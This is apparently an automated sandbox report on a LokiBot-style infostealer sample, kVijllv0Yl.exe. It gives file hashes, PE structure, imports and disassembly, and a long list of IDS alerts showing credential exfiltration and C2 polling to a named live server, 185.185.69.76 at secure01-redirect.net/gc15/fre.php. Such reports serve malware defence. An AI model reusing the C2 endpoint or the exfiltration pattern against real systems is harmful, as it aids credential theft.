          http://www.ibsensoftware.com/ | kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

              IP | Domain | Country | ASN | ASN Name | Malicious
              185.185.69.76 | secure01-redirect.net | Russian Federation | 35278 | SPRINTHOSTRU | true
              IP
              192.168.2.1
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:562515
              Start date:28.01.2022
              Start time:23:36:03
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 58s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:kVijllv0Yl (renamed file extension from none to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:21
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@35/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 77.4% (good quality ratio 74.7%)
              • Quality average: 77.1%
              • Quality standard deviation: 28%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 66
              • Number of non-executed functions: 38
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              Time | Type | Description
              23:37:15 | API Interceptor | 32x Sleep call for process: kVijllv0Yl.exe modified

              Match | Associated Sample Name / URL | Detection | Context
              185.185.69.76 | aaaaa.xls | malicious | secure01-redirect.net/gc15/fre.php
              No context
              Match | Associated Sample Name / URL | Detection | Context
              C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll | aaaaa.xls | malicious |
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):269906
                Entropy (8bit):7.658711659128666
                Encrypted:false
                SSDEEP:6144:uuOB0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUYtDw:tr1XaeS0xw5XNVGx0xjH
                MD5:3E44A21AFF425B74994D8A28FFF9B23E
                SHA1:1654662D1C4F390E994D4C858D8B820FE651605C
                SHA-256:8D848BF31B17F081AAFA0AA4535767365C8CC518A8A434776733A06DE10921C9
                SHA-512:AFD4358FCA881DE6C7587C407FC66014FD5A6EB1E3DB604CBBA7F53766141C2C0CC170A0D8B7C066169BC14EFA805A9725FE18A89B6C7A4967DE61E80D941E07
                Malicious:false
                Reputation:low
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):20992
                Entropy (8bit):5.749135787820481
                Encrypted:false
                SSDEEP:384:Yb6PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbotKb:YbG1albrXY0HwinMdZeUhbogb
                MD5:C91E53F1A792E1F98CAE5FAF1B3324BD
                SHA1:4CD46871507173B3B4EAB34A2885E76E4D60E32A
                SHA-256:2F51361FFE7DC60A4088469A27E570F22CF655E87720D26626B4E257492739E9
                SHA-512:25AC355D4FB8DD503921B62AA5F869C5805F6909C7079633B5EB4BE9C6094B708D216786AA8D025712558745AEF13A7F3F9FEFA7D5C82BEA44957737E954176C
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 28%, Browse
                Joe Sandbox View:
                • Filename: aaaaa.xls, Detection: malicious, Browse
                Reputation:low
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):4967
                Entropy (8bit):6.171281725061639
                Encrypted:false
                SSDEEP:96:NPyed2g5U8YofB+TCC1CTHLBiA5CECh5+AU+P6dOuG3xiuoggvX3K:hyyzPfGVCTHLBiA5Ctf+AU+PI1GwuorK
                MD5:6A777038ED583DD539A48B85A672378F
                SHA1:2B24614BD0F041619CBEA3AC3DFCE400C0A7A30B
                SHA-256:D15DA5D9FC537DA388F115A3E951FC44CCD30BB62B0F9131EE1F1B42C8B70413
                SHA-512:48C0BB9A6873B022F561C77BA69C769BB9352CF02B476FFCBB63A14EC8F554FCDA792EFD7203650ABB2877D3E0D4CEF3FA1EF5D46BBD9A5C3ECE002F30257B6E
                Malicious:false
                Reputation:low
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):218255
                Entropy (8bit):7.988008060500998
                Encrypted:false
                SSDEEP:6144:N0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUe:ur1XaeS0xw5XNVGx0xjV
                MD5:4ABFD766D3D71773430A02F9CDDC33B2
                SHA1:D623A96E0F04A04CB73F632D89263513AB9EA5E4
                SHA-256:5F335EA5F3D9C2FC3E21CAA50C960EEE648BA5988D99490DA32F9A6A4009EEE6
                SHA-512:BD6A540D1884FFCAB7BFE760480474C2BB329F803A413BD143126A66F8184E5566830E4F09BA07F8E24C4476FD5556487519FDC8D73499EE239A1B94E82A0366
                Malicious:false
                Reputation:low
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1
                Process:C:\Users\user\Desktop\kVijllv0Yl.exe
                File Type:data
                Category:dropped
                Size (bytes):49
                Entropy (8bit):1.2701062923235522
                Encrypted:false
                SSDEEP:3:/l1PL3n:fPL3
                MD5:CD8FA61AD2906643348EEF98A988B873
                SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                Malicious:false
                Preview:........................................user.
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                Entropy (8bit):7.9269620673373185
                TrID:
                • Win32 Executable (generic) a (10002005/4) 92.16%
                • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:kVijllv0Yl.exe
                File size:247353
                MD5:6997de404fb7e798aecc2c8a14fd2f12
                SHA1:121a437542ba544f975847429dda439719800bb9
                SHA256:f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
                SHA512:bb3fe544bdf9770bbb9864d9e14daa68d8357a91d06f33f90b7165467c608b9a2fd46009b37f4d914112d18acceaaa1cd3e2df92db65ec0f1bc20b41a020faa5
                SSDEEP:3072:oNyah0mJo4m2pkC3Z4FRH8aVAW3dxaj0ubNDHgJiLwYePSCfPrpAfZSQme11lz:owkZN3KRHXA0ajnHXYPbfjKxce1bz
                Icon Hash:b2a88c96b2ca6a72
                Entrypoint:0x403225
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:099c0646ea7282d232219f8807883be0
                Instruction
                sub esp, 00000180h
                push ebx
                push ebp
                push esi
                xor ebx, ebx
                push edi
                mov dword ptr [esp+18h], ebx
                mov dword ptr [esp+10h], 00409128h
                xor esi, esi
                mov byte ptr [esp+14h], 00000020h
                call dword ptr [00407030h]
                push 00008001h
                call dword ptr [004070B4h]
                push ebx
                call dword ptr [0040727Ch]
                push 00000008h
                mov dword ptr [00423F58h], eax
                call 00007F4D3C573CD0h
                mov dword ptr [00423EA4h], eax
                push ebx
                lea eax, dword ptr [esp+34h]
                push 00000160h
                push eax
                push ebx
                push 0041F450h
                call dword ptr [00407158h]
                push 004091B0h
                push 004236A0h
                call 00007F4D3C573987h
                call dword ptr [004070B0h]
                mov edi, 00429000h
                push eax
                push edi
                call 00007F4D3C573975h
                push ebx
                call dword ptr [0040710Ch]
                cmp byte ptr [00429000h], 00000022h
                mov dword ptr [00423EA0h], eax
                mov eax, edi
                jne 00007F4D3C57119Ch
                mov byte ptr [esp+14h], 00000022h
                mov eax, 00429001h
                push dword ptr [esp+14h]
                push eax
                call 00007F4D3C573468h
                push eax
                call dword ptr [0040721Ch]
                mov dword ptr [esp+1Ch], eax
                jmp 00007F4D3C5711F5h
                cmp cl, 00000020h
                jne 00007F4D3C571198h
                inc eax
                cmp byte ptr [eax], 00000020h
                je 00007F4D3C57118Ch
                cmp byte ptr [eax], 00000022h
                mov byte ptr [eax+eax+00h], 00000000h
                Programming Language:
                • [EXP] VC++ 6.0 SP5 build 8804
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94693169534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country
                RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
                RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
                RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
                RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
                RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
                RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
                DLL | Import
                KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                Language of compilation system | Country where language is spoken
                English | United States
                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                01/28/22-23:37:07.260369 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49769 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:07.260369 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49769 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:07.260369 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49769 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:07.260369 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49769 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:10.277966 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49770 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:10.277966 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:10.277966 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:10.277966 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49770 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:14.709347 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49771 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:14.709347 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49771 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:14.709347 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49771 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:14.709347 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49771 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:16.117797 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49771 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:17.458669 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49773 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:17.458669 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49773 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:17.458669 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49773 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:17.458669 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49773 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:18.890584 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49773 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:20.261992 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49774 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:20.261992 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49774 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:20.261992 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49774 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:20.261992 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49774 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:21.668707 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49774 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:22.809911 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49775 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:22.809911 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49775 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:22.809911 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49775 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:22.809911 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49775 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:24.212196 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49775 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:25.398463 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49776 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:25.398463 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49776 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:25.398463 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49776 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:25.398463 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49776 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:26.758080 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49776 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:29.263306 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49779 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:29.263306 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49779 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:29.263306 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49779 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:29.263306 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49779 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:30.738582 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49779 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:33.962521 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49780 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:33.962521 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49780 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:33.962521 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49780 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:33.962521 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49780 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:35.373624 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49780 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:36.594728 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49782 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:36.594728 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49782 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:36.594728 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49782 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:36.594728 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49782 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:37.913035 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49782 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:39.408767 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49783 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:39.408767 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49783 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:39.408767 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49783 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:39.408767 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49783 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:40.689153 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49783 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:41.973820 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49784 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:41.973820 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49784 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:41.973820 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49784 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:41.973820 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49784 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:43.403239 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49784 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:44.786353 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49787 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:44.786353 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49787 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:44.786353 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49787 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:44.786353 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49787 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:46.235905 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49787 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:51.111628 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49793 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:51.111628 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49793 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:51.111628 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49793 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:51.111628 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49793 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:52.495630 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49793 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:55.089534 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49795 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:55.089534 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49795 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:55.089534 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49795 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:55.089534 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49795 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:56.498845 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49795 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:37:59.460407 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49797 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:59.460407 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49797 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:59.460407 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49797 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:37:59.460407 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49797 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:00.863838 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49797 | 185.185.69.76 | 192.168.2.6
                01/28/22-23:38:02.169112 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49802 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:02.169112 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49802 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:02.169112 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49802 | 80 | 192.168.2.6 | 185.185.69.76
                01/28/22-23:38:02.169112 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49802 | 80 | 192.168.2.6 | 185.185.69.76
